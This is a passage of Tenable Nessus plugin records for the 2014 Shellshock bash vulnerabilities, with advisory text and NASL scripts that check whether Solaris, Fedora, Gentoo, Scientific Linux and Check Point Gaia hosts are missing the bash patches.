script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Solaris/showrev\")) audit(AUDIT_OS_NOT, \"Solaris 10 or earlier\");\n\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbashS\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\nif (solaris_check_patch(release:\"5.9\", arch:\"sparc\", patch:\"149079-03\", obsoleted_by:\"\", package:\"SUNWbash\", version:\"11.9.0,REV=2002.03.02.00.35\") < 0) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:solaris_get_report());\n else security_hole(0);\n exit(0);\n}\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:bash", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-11514.NASL", "href": "https://www.tenable.com/plugins/nessus/77939", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-11514.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77939);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"FEDORA\", value:\"2014-11514\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 19 : bash-4.2.48-2.fc19 (2014-11514) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This build should fix CVE-2014-7169\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1146319\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138679.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?80775253\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"bash-4.2.48-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:30:11", "description": "The remote host is running a version of Gaia OS which is affected by issues related to the SHELLSHOCK set of vulnerabilities in bash. An error in the bash functionality that evaluates specially formatted environment variables passed to it from another environment, which may result in remote code execution.", "cvss3": {}, "published": "2017-12-04T00:00:00", "type": "nessus", "title": "Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:check_point:gaia_os"], "id": "CHECK_POINT_GAIA_SK102673.NASL", "href": "https://www.tenable.com/plugins/nessus/104997", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104997);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Check Point Gaia Operating Bash Code Injection (sk102673)(SHELLSHOCK)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Gaia OS which is affected by issues\nrelated to the SHELLSHOCK set of vulnerabilities in bash. An error in the bash \nfunctionality that evaluates specially formatted environment variables passed \nto it from another environment, which may result in remote code execution.\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk102673\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8d7a5ca\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk104443&partition=General&product=Security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba5b918a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to an unaffected version or apply vendor-supplied hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-6271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:check_point:gaia_os\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"check_point_gaia_os_version.nbin\");\n script_require_keys(\"Host/Check_Point/version\", \"Host/Check_Point/installed_hotfixes\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Gaia Operating System\";\nversion = get_kb_item_or_exit(\"Host/Check_Point/version\");\nhfs = get_kb_item_or_exit(\"Host/Check_Point/installed_hotfixes\");\nvuln = FALSE;\n\nif (version =~ \"R7[01]\")\n{\n vuln = TRUE;\n fix = \"Upgrade to an unaffected version or contact Checkpoint support.\";\n}\nelse if (version =~ \"R75\\.4[0567]\" || version =~ \"R76\" || version =~ \"R77(\\.[12]0)?$\")\n{\n if(!(\"sk102673\" >< hfs && \"sk104443\" >< hfs))\n vuln = TRUE;\n fix = \"Apply Hotfix sk102673 or sk104443\";\n}\nelse\n audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n\nif(vuln)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fix : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "The remote host is affected by the vulnerability described in GLSA-201409-10 (Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n Impact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary commands even in restricted environments.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:bash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201409-10.NASL", "href": "https://www.tenable.com/plugins/nessus/77886", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201409-10.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77886);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"GLSA\", value:\"201409-10\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GLSA-201409-10 : Bash: Code Injection (Updated fix for GLSA 201409-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is affected by the vulnerability described in GLSA-201409-10\n(Bash: Code Injection (Updated fix for GLSA 201409-09))\n\n Stephane Chazelas reported that Bash incorrectly handles function\n definitions, allowing attackers to inject arbitrary code (CVE-2014-6271).\n Gentoo Linux informed about this issue in GLSA 201409-09.\n Tavis Ormandy reported that the patch for CVE-2014-6271 was incomplete.\n As such, this GLSA supersedes GLSA 201409-09.\n \nImpact :\n\n A remote attacker could exploit this vulnerability to execute arbitrary\n commands even in restricted environments.\n \nWorkaround :\n\n There is no known workaround at this time.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security.gentoo.org/glsa/201409-10\");\n script_set_attribute(attribute:\"solution\", value:\n\"All Bash 3.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.1_p18-r1:3.1'\n All Bash 3.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-3.2_p52-r1:3.2'\n All Bash 4.0 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.0_p39-r1:4.0'\n All Bash 4.1 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.1_p12-r1:4.1'\n All Bash 4.2 users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-shells/bash-4.2_p48-r1'\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"app-shells/bash\", unaffected:make_list(\"rge 3.1_p18-r1\", \"rge 3.2_p52-r1\", \"rge 4.0_p39-r1\", \"rge 4.1_p12-r1\", \"ge 4.2_p48-r1\"), vulnerable:make_list(\"lt 4.2_p48-r1\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-04T14:50:15", "description": "It was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update.\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to https://securityblog.redhat.com/2014/09/24/bash-specially crafted-environment-variables-code-injection-attack/", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:bash", "p-cpe:/a:fermilab:scientific_linux:bash-debuginfo", "p-cpe:/a:fermilab:scientific_linux:bash-doc", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20140926_BASH_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/77956", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77956);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Scientific Linux Security Update : bash on SL5.x, SL6.x i386/x86_64 (20140926) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"It was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update.\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto https://securityblog.redhat.com/2014/09/24/bash-specially\ncrafted-environment-variables-code-injection-attack/\");\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1409&L=scientific-linux-errata&T=0&P=1987\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7d56c5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"bash-debuginfo-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"SL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-debuginfo-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:13:27", "description": "SunOS 5.10: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Solaris 10 (sparc) : 126546-06", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:sun:solaris"], "id": "SOLARIS10_126546-06.NASL", "href": "https://www.tenable.com/plugins/nessus/77913", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\n#\n# The descriptive text in this plugin was\n# extracted from the Oracle SunOS Patch Updates.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77913);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\");\n script_bugtraq_id(70103, 70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Solaris 10 (sparc) : 126546-06\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing Oracle Security Patch number 126546-06\");\n script_set_attribute(attribute:\"description\", value:\n\"SunOS 5.10: bash patch. \n\nDate this patch was last updated by Oracle : Sep/26/14\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://blogs.oracle.com/patch/entry/solaris_idrs_available_on_mos\");\n script_set_attribute(attribute:\"see_also\", value:\"https://getupdates.oracle.com/readme/126546-06\");\n script_set_attribute(attribute:\"solution\", value:\n\"You should install this patch for your system to be up-to-date.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:sun:solaris\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Solaris Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Solaris/showrev\", \"Host/Solaris/pkginfo\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"solaris.inc\");\n\nif 